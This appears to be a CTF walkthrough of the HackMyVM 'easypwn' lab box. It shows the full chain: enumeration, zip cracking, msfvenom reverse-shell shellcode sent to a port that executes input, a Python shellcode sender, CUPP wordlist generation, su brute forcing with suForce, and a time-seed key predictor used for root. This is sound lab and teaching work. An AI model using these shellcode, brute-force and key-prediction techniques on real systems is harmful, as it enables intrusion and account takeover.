HackMyVM-easypwn-Walkthrough
Author: 城南花已开

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.227 08:00:27:a1:cf:6f PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

11 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.103 seconds (121.73 hosts/sec). 4 responded
export ip=192.168.60.227
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.227:22
Open 192.168.60.227:80
Open 192.168.60.227:6666
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 17:44 CST
Initiating ARP Ping Scan at 17:44
Scanning 192.168.60.227 [1 port]
Completed ARP Ping Scan at 17:44, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:44
Completed Parallel DNS resolution of 1 host. at 17:44, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:44
Scanning 192.168.60.227 [3 ports]
Discovered open port 80/tcp on 192.168.60.227
Discovered open port 22/tcp on 192.168.60.227
Discovered open port 6666/tcp on 192.168.60.227
Completed SYN Stealth Scan at 17:44, 0.05s elapsed (3 total ports)
Nmap scan report for 192.168.60.227
Host is up, received arp-response (0.00044s latency).
Scanned at 2025-03-04 17:44:51 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
6666/tcp open irc syn-ack ttl 64
MAC Address: 08:00:27:A1:CF:6F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Directory enumeration

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.227
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 930]
/mysecret.txt (Status: 200) [Size: 383]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

That gives us a text file.

Fetch it with curl.

Haha, the nicknames in this wordlist look very familiar 🤣

❯ curl $ip/mysecret.txt
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


/YTlPX4d2UENbWnI.txt
❯ curl $ip/YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

Probing the entry point

Since the hint points there, the information must be on port 6666.

Connect with nc and type anything; the server answers and then reports that it is waiting for a client connection (the [*] 等待客户端连接... line in the output below).

❯ nc $ip 6666 -vn
(UNKNOWN) [192.168.60.227] 6666 (?) open
id
Hackers, get out of my machine
[*] 等待客户端连接...

Since the box is called easypwn, this is bound to be a pwn challenge.

Run the directory scan again, this time with the wordlist we just obtained.

That turns up /ll104567.zip.

❯ curl  $ip/YTlPX4d2UENbWnI.txt -o user.txt
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 68 100 68 0 0 27102 0 --:--:-- --:--:-- --:--:-- 34000
❯ gobuster dir -u "http://$ip" -w user.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.227
[+] Method: GET
[+] Threads: 10
[+] Wordlist: user.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/ll104567 (Status: 200) [Size: 739584]
/ll104567.zip (Status: 200) [Size: 739584]
Progress: 50 / 55 (90.91%)
===============================================================
Finished
===============================================================

Fetch it with wget to get the archive, then crack the archive password with zip2john and john.

❯ wget $ip/ll104567.zip
--2025-03-04 18:19:48-- http://192.168.60.227/ll104567.zip
Connecting to 192.168.60.227:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 739584 (722K) [application/zip]
Saving to: ‘ll104567.zip’

ll104567.zip 100%[=======================================================================>] 722.25K --.-KB/s in 0.03s

2025-03-04 18:19:48 (22.5 MB/s) - ‘ll104567.zip’ saved [739584/739584]

❯ zip2john ll104567.zip >hash
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
oooooo (ll104567.zip/opt/server)
1g 0:00:00:00 DONE (2025-03-04 18:19) 25.00g/s 204800p/s 204800c/s 204800C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ x ll104567.zip
extract: extracting to ll104567
Archive: /home/Pepster/hmv/ll104567.zip
[/home/Pepster/hmv/ll104567.zip] opt/server password:
inflating: opt/server
❯ tree opt
opt
└── server

1 directory, 1 file

Extracting the archive yields a file named server, which turns out to be an executable.

cd opt
ls -al
total 2080
drwxr-xr-x 2 Pepster Pepster 4096 Mar 4 18:20 .
drwxr-xr-x 10 Pepster Pepster 4096 Mar 4 18:20 ..
-rwxr-xr-x 1 Pepster Pepster 2120576 Feb 24 21:08 server
❯ file server
server: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=db87ec3af59f50fcd961031784692ff086072fd2, not stripped

Reversing the server program

Open it in IDA and reverse it. Since the binary is statically linked and not stripped, the symbol names survive, which makes the job easier.

I don't really know how to do this, but that's fine, I'll just learn as I go.

It turns out to be the program listening on port 6666; decompiling it produces pseudo-C.

[image: IDA pseudo-C decompilation of server]

Handed straight to GPT for an explanation.

Its main functionality:

  1. Create a socket and bind it to port 6666.
  2. Listen for incoming connections on that port.
  3. After accepting a connection, read the data and check whether it contains any forbidden byte.
  4. If the data contains a forbidden byte, print a warning and close the connection.
  5. Otherwise, map the data into executable memory and execute it.
  6. Handle errors along the way and print the corresponding messages.

I was lucky enough to play a pre-release version of this box; in that first version the program told you exactly which forbidden byte it had detected.

For example, putting a space in the second position gave a message that 0x20 (space) had been detected.

So we only need to generate shellcode and filter out the forbidden bytes.

[image: pre-release server reporting the detected forbidden byte 0x20]

In the release version of the box the author apparently anticipated this and removed that code, so we have to trace forbidden_bytes ourselves.

Look at the hex values after the db directives.

[image: forbidden_bytes db directives in .rodata]

From the .rodata section we can extract (at least part of) the forbidden byte set:

0x00 (NUL), 0x20 (space), 0x0F, 0xCD

It is worth noticing what the last two bytes rule out: 0x0F 0x05 is the syscall instruction and 0xCD 0x80 is int 0x80, so no unencoded x86-64 shellcode that makes a system call can get past the check. An encoder works around it because the decoder stub itself contains none of these bytes and only rebuilds the syscall opcode in memory after the server has already finished checking the buffer.

Generating shellcode

Use msfvenom to generate reverse-shell shellcode, passing -b to exclude the forbidden bytes.

Spell the options LHOST and LPORT: msfvenom does not complain about an option name it does not recognise (the original command had the typo Lprot), in which case LPORT silently falls back to the payload default of 4444, which only happens to match the listener used below.

❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.60.100 LPORT=4444 -b '\x00\x20\x0f\xcd' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
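As an added example (not from the original walkthrough, and not the server's own code), the following Python script reproduces the server's forbidden-byte check on a payload before sending it, so a rejected byte is reported with its offset instead of just the "Hackers, get out of my machine" message. The byte set is the one recovered from .rodata above; the unencoded x86-64 execve("/bin/sh") stub embedded in it is a constructed sample used to show that the plain syscall instruction (0x0F 0x05) is what trips the check. The host and port given on the command line are assumptions.

```python
"""Check a raw shellcode blob against the server's forbidden bytes, then deliver it.

Added example, not part of the original walkthrough and not the server's code.
"""
import socket
import sys

# Forbidden bytes recovered from the server binary's .rodata (see above).
FORBIDDEN = frozenset({0x00, 0x20, 0x0F, 0xCD})

# Constructed sample: plain x86-64 execve("/bin//sh", NULL, NULL), no encoder.
RAW_SHELLCODE = bytes([
    0x48, 0x31, 0xF6,                                            # xor  rsi, rsi
    0x56,                                                        # push rsi   (argv/envp terminator)
    0x48, 0xBF, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73, 0x68,  # mov  rdi, "/bin//sh"
    0x57,                                                        # push rdi
    0x54,                                                        # push rsp
    0x5F,                                                        # pop  rdi   (rdi -> "/bin//sh")
    0x6A, 0x3B,                                                  # push 0x3b  (SYS_execve)
    0x58,                                                        # pop  rax
    0x99,                                                        # cdq        (rdx = 0)
    0x0F, 0x05,                                                  # syscall    <- contains 0x0F
])


def find_forbidden(payload: bytes, forbidden=FORBIDDEN) -> list:
    """Return (offset, byte) for every forbidden byte, in order of occurrence."""
    return [(i, b) for i, b in enumerate(payload) if b in forbidden]


def is_clean(payload: bytes, forbidden=FORBIDDEN) -> bool:
    """True when the server's check would let the payload through."""
    return not find_forbidden(payload, forbidden)


def deliver(host: str, port: int, payload: bytes, timeout: float = 5.0) -> int:
    """Refuse to send anything the server would reject, then push the bytes."""
    bad = find_forbidden(payload)
    if bad:
        raise ValueError("payload would be rejected: " +
                         ", ".join(f"0x{b:02x}@{i}" for i, b in bad))
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(payload)
        return len(payload)


if __name__ == "__main__":
    # usage: python3 check_and_send.py tmp 192.168.60.227 6666   (host/port assumed)
    if len(sys.argv) != 4:
        print("raw stub, forbidden bytes at:", find_forbidden(RAW_SHELLCODE))
    else:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
        print("sent", deliver(sys.argv[2], int(sys.argv[3]), blob), "bytes")
```

Run it as python3 check_and_send.py tmp 192.168.60.227 6666 after starting the listener; with no arguments it only reports the offsets in the sample stub (the single 0x0F of the syscall instruction). Because deliver() refuses anything the check would reject, a bad-byte mistake shows up locally instead of costing a round trip when trying other encoders.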

User access

Send this payload to port 6666 while listening on port 4444 to catch the reverse shell. Because the server maps the buffer into memory and jumps into it, the shell runs as the user the server runs as, here lamb.

That gives us the user flag.

cat tmp|nc $ip 6666
------------------------------
❯ pwncat-cs -lp 4444
[20:03:10] Welcome to pwncat 🐈! __main__.py:164
[20:06:12] received connection from 192.168.60.227:50488 bind.py:84
[20:06:13] 0.0.0.0:4444: upgrading from /usr/bin/dash to manager.py:957
/usr/bin/bash
[20:06:14] 192.168.60.227:50488: registered new host w/ db manager.py:957
(local) pwncat$
(remote) lamb@pwnding:/home/lamb$ ls -al
total 28
drwxr-xr-x 2 lamb lamb 4096 Feb 24 07:52 .
drwxr-xr-x 3 root root 4096 Feb 19 20:34 ..
lrwxrwxrwx 1 lamb lamb 9 Feb 19 09:27 .bash_history -> /dev/null
-rw-r--r-- 1 lamb lamb 220 Feb 19 09:23 .bash_logout
-rw-r--r-- 1 lamb lamb 3526 Feb 19 09:23 .bashrc
-rw-r--r-- 1 lamb lamb 807 Feb 19 09:23 .profile
-rw------- 1 lamb lamb 0 Feb 20 03:18 .viminfo
-rw-r--r-- 1 root root 528 Feb 24 07:52 this_is_a_tips.txt
-rw-r--r-- 1 lamb lamb 39 Feb 24 07:52 use3e3e3e3e3sr.txt
(remote) lamb@pwnding:/home/lamb$ cat use3e3e3e3e3sr.txt
flag{3a463d08f2ae11efbeb6000c29094b2d}

(remote) lamb@pwnding:/home/lamb$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.


Reversing the getroot program

There is also a note with a hint: getroot is the only route. It takes a magic_number argument, and whatever number you pass produces no output.

So find the program and reverse it.

The file is world-readable and executable, so copy it to the local machine.

(remote) lamb@pwnding:/home/lamb$ getroot
Usage: getroot <magic_number>
(remote) lamb@pwnding:/home/lamb$ which getroot
/usr/local/bin/getroot
(remote) lamb@pwnding:/home/lamb$ ls -al /usr/local/bin/getroot
-rwxr-xr-x 1 root root 18912 Feb 20 02:19 /usr/local/bin/getroot
(remote) lamb@pwnding:/home/lamb$ cp /usr/local/bin/getroot .
(remote) lamb@pwnding:/home/lamb$
(local) pwncat$ download getroot
getroot ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 18.9/18.9 KB • ? • 0:00:00
[20:21:39] downloaded 18.91KiB in 0.07 seconds

Open it in IDA Pro.

[image: IDA pseudo-C decompilation of getroot]

Handed it to Deepseek to analyze step by step and produce a program that generates magic_number by reproducing the original logic exactly.

The steps are:

  1. Seed with the current time: srand(seed).

  2. First call to rand(): v21 = rand() % 86400.

  3. Then generate_normal_distribution is called; internally it calls rand() twice to get u1 and u2 and computes the normally distributed value z0.

  4. From z0 (v3) compute temp = (int)(5.0 * z0) + v21.

  5. Clamp temp to the range 0..86399, giving v16.

  6. key = v16 + 12345.

So step into generate_normal_distribution to see the algorithm it implements (a Box-Muller transform: sqrt(-2 ln u1) * cos(2π u2)), after which the full program reproducing the original call sequence is:

#include <iostream>
#include <cmath>
#include <ctime>
#include <cstdlib>
#include <algorithm>

using namespace std;

// Mirrors getroot's generate_normal_distribution: a Box-Muller transform fed by
// two consecutive rand() calls, so the rand() call order matches the original.
double generate_normal_distribution() {
    double x  = rand() / 2147483647.0; // 2147483647 = 0x7FFFFFFF = RAND_MAX on glibc
    double v3 = rand() / 2147483647.0;

    double v0 = log(x);            // the log() seen in the IDA pseudocode
    double v2 = sqrt(-2.0 * v0);   // Box-Muller radius

    // 6.283185307179586 is 2*M_PI at the precision used by the binary
    return cos(6.283185307179586 * v3) * v2;
}

int main() {
    srand(time(0)); // same seed as getroot: must run within the same second

    // first rand() call (v21 in the original)
    int v21 = rand() % 86400;

    // normally distributed value (consumes the next two rand() calls)
    double normal_value = generate_normal_distribution();

    // final value
    int temp = static_cast<int>(5.0 * normal_value) + v21;
    temp = max(0, min(temp, 86399)); // clamp to the allowed range
    int key = temp + 12345;          // final key

    cout << key << endl;
    return 0;
}

Upload it to the target and compile it there (the binary is statically linked against the target's libc, so rand() behaves the same as in getroot).

(remote) lamb@pwnding:/tmp$
(local) pwncat$ upload a.c
./a.c ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 1.1/1.1 KB • ? • 0:00:00
[20:50:35] uploaded 1.11KiB in 0.27 seconds
(remote) lamb@pwnding:/tmp$ g++ -o key a.c -B /usr/bin/
(remote) lamb@pwnding:/tmp$ ./key
61018

Generating a wordlist with CUPP

From the pseudo-C we also learn that, given the correct magic_number, the program tries to open /root/cred and print its contents. We have no permission to read anything under /root, and getroot itself is a plain root-owned binary with no SUID bit (see the ls -al output above), so it has to be run via sudo.

The problem is that we don't know lamb's password.

Following the hint, generate a social-engineering wordlist with CUPP and brute-force it.

Running linpeas.sh reveals a hidden file under /var/backups:

-rw-r--r-- 1 root root 1936 Feb 24 07:59 /var/backups/.secret/.verysecret/.noooooo/note2.txt

[image: contents of note2.txt]

This... only gives us two names, David and Jake, plus a squirrel called Sir Nibbles, and no other information at all.

I was stuck here for half an hour 😅

I first tried entering the names directly as First name and Surname to get a dictionary, with no result.

Then I tried feeding the text itself to cupp as the information source, which generated 19 lines, and ran that for a while.

I asked the author for a hint and still didn't get it for a moment; I was stumped 😑

Reading the story in the note carefully, it is about a father, David, and his son, Jake.

So the fields have to be filled in in that order: David as the first name and Jake as the child's name.

❯ python cupp.py -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | [email protected] ]
[ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: David
> Surname:
> Nickname:
> Birthdate (DDMMYYYY):


> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):


> Child's name: Jake
> Child's nickname:
> Child's birthdate (DDMMYYYY):


> Pet's name:
> Company name:


> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 500 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with david.txt and shoot! Good luck!
❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.227 - - [04/Mar/2025 22:39:54] "GET /david.txt HTTP/1.1" 200 -
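As an added example, not part of the original walkthrough and not cupp's own code, the script below reimplements the kind of mutations a profiler like cupp applies (case changes, reversal, separators, year suffixes) so the effect of the field ordering is visible: with David as the first name and Jake as the child's name, the candidate ekaJ_2016 (the password suForce finds in the next section) is simply the reversed, capitalised child's name, an underscore and a year, and it is absent when only David is entered. The separator set and the year window are assumptions, not cupp's configuration.

```python
"""Generate cupp-style social-engineering password candidates.

Added example, not part of the original walkthrough and not cupp's code.
"""
import itertools

SEPARATORS = ("", "_", ".", "-")                    # assumed separators before a year
YEARS = tuple(str(y) for y in range(1990, 2026))     # assumed year window


def name_variants(name: str) -> set:
    """Case and reversal mutations of one name (Jake -> jake, JAKE, ekaj, ekaJ, ...)."""
    low = name.lower()
    cap = low.capitalize()
    return {low, cap, low.upper(), low[::-1], low[::-1].capitalize(), cap[::-1]}


def build_wordlist(first: str, child: str = "", partner: str = "",
                   pet: str = "", years=YEARS, separators=SEPARATORS) -> list:
    """Combine every profile name with separators and years, cupp-style.

    Empty fields are skipped, so leaving the child's name out removes every
    Jake-derived candidate, which is exactly what went wrong in the first attempts.
    """
    words = set()
    for person in (first, child, partner, pet):
        if not person:
            continue
        variants = name_variants(person)
        words |= variants                       # bare names: Jake, ekaJ, ...
        for v, sep, y in itertools.product(variants, separators, years):
            words.add(f"{v}{sep}{y}")           # ekaJ_2016
            words.add(f"{v}{sep}{y[-2:]}")      # ekaJ_16
    return sorted(words)


def write_wordlist(path: str, words) -> int:
    """Write one candidate per line (format expected by suForce/hydra); returns count."""
    with open(path, "w") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    # Profile from note2.txt: father David, son Jake (the pet is left out here).
    wl = build_wordlist("David", child="Jake")
    print(write_wordlist("david.txt", wl), "candidates;", "ekaJ_2016" in wl)
```

The resulting david.txt can be served over HTTP and fed to suForce exactly as the cupp output is below; the point of the example is that a profiler only ever mutates what it is given, so the profile fields, not the mutation rules, decide whether the real password is in the list.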

Root privilege escalation

Run the wordlist through suForce.

d4t4s3c/suForce: Obtain a user's system password, this tool uses the su binary to perform a brute force attack until a successful collision occurs.

This yields the password ekaJ_2016.

(remote) lamb@pwnding:/tmp$ wget 192.168.60.100:8000/david.txt
--2025-03-04 09:39:55-- http://192.168.60.100:8000/david.txt
Connecting to 192.168.60.100:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4987 (4.9K) [text/plain]
Saving to: 'david.txt.2'

david.txt.2 100%[==============>] 4.87K --.-KB/s in 0s

2025-03-04 09:39:55 (459 MB/s) - 'david.txt.2' saved [4987/4987]
(remote) lamb@pwnding:/tmp$ ./suForce -u lamb -w david.txt.2
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt.2
🔎 Status | 372/499/74%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────


(remote) lamb@pwnding:/tmp$ sudo -l
[sudo] password for lamb:
Matching Defaults entries for lamb on pwnding:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
(ALL : ALL) PASSWD: /usr/local/bin/getroot

Use getroot to obtain root's credential and log in. Both key and getroot seed srand() with the current time, so they must run within the same second; running them as one command, sudo /usr/local/bin/getroot $(./key), does that. Note that $(./key) is evaluated before sudo starts, so if sudo prompts for a password at this point the delay can push getroot into a different second; here the earlier sudo -l has already cached the credential. What getroot prints is the contents of /root/cred, an MD5-crypt ($1$) hash.

(remote) lamb@pwnding:/tmp$ sudo /usr/local/bin/getroot $(./key)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0
(remote) lamb@pwnding:/tmp$ su root
Password:
root@pwnding:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@pwnding:/tmp# cat /root/
.bash_history ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
.bashrc .selected_editor
cred .ssh/
.local/ .vim/
monitor.sh .viminfo
.profile
root@pwnding:/tmp# cat /root/ro0oo0ooo0oooo0oooo0ooo0oo0ot.txt
flag{46511d58f2ae11ef9ea3000c29094b2d}